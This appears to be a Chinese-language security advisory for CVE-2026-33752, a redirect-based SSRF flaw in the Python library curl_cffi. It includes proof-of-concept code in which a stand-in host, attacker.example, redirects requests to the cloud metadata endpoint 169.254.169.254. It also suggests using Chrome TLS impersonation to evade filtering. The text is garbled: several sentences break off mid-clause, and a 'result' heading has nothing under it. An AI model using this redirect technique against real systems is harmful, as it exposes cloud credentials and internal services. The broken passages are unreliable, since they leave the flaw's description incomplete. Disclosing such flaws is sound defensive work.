CVE-2026-33752(基于重定向的 SSRF,可导致 curl_cffi 访问内部网络)
curl_cffi 未限制对内部 IP 范围的请求,并会通过底层 libcurl 自动跟随重定向。
因此,攻击者可控的 URL 可以将请求重定向到云元数据端点等内部服务。此外,curl_cffi 的 TLS 模拟功能可使这些请求看起来像合法的浏览器流量,从而可能绕过某些网络控制。
该问题源于 curl_cffi 处理出站请求的方式
这意味着,即使应用程序只允许请求外部 URL,攻击者也可以
因此,内部端点(例如云实例元数据 API)可以被访问。
此外,curl_cffi 支持 TLS 指纹模拟(例如 impersonate="chrome")。在根据 TLS 指纹过滤出站请求的环境中,这可能使此类请求更难被检测或阻止。
此行为与之前报告的基于重定向的 SSRF 问题(如 CVE-2025-68616)类似,即重定向允许访问非预期的内部资源。
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
受害者代码:
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
结果
import curl_cffi\
resp = curl_cffi.get(
"https://attacker.example/test",
impersonate="chrome")
在某些环境中,这可能有助于请求绕过基于 TLS 的过滤控制。
能够控制请求 URL 的攻击者可能能够: